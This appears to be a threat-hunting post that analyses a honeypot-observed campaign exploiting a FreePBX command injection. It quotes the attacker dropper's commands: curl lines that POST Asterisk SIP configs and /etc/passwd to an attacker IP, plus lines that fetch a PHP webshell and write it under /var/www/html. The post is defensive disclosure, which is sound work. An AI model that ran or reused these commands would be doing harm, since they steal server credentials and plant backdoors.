Found a request in my HTTP honeypot I couldn't explain. Investigation revealed it's been scanning widely and attempting to exploit a FreePBX command injection vulnerability and install a webshell.
77.247.108.81 - - [21/Sep/2021:18:54:34 -0400] "GET /gbr.php HTTP/1.1" 400 226 "-" "gbrmss/7.29.0" "ct:text/html"
Using this IP I spotted this link which showed me the form data: https://threatwar.com/attackers/695a2a8e-3cb6-4d74-8af8-d5058079a909
Based on the request there this appears to be an RCE injected via the "language" header. Exploit here: https://www.exploit-db.com/exploits/40434
From there I investigated the initial dropper:
77[.]247[.]108.42/g/?shFrPbN0=IPAPY
It's about 900 bytes long, but it has a variable hash - the client IP is included in the payload for future requests.
The script will POST the Asterisk server config to the host:
curl -d "`cat /etc/asterisk/sip*`" "http://77[.]247.108.42/g/?d=sipConfs&i=${stIp}"
(where the variable stIp is the server's IP address, populated in the script earlier) and then attempt to upload the password file, too:
curl -d "`cat /etc/passwd`" "http://77[.]247.108.42/g/?d=etc_passwd&i=${stIp}"
The script will also download a PHP script from the server and install it as "config.php" under all web directories (after finding all writable directories under /var/www/html).
shellContent=`curl -s "77[.]247.108.42/g/?f=phFrPb&i=${stIp}"`
It will also create a new directory for this PHP backdoor and put it under "index.php":
mkdir -p /var/www/html/cnfg 2>/dev/null
echo "$shellContent" > /var/www/html/cnfg/index.php 2>/dev/null
A Yara rule is enclosed, too, to detect the webshell (TLP:GREEN).
Happy hunting.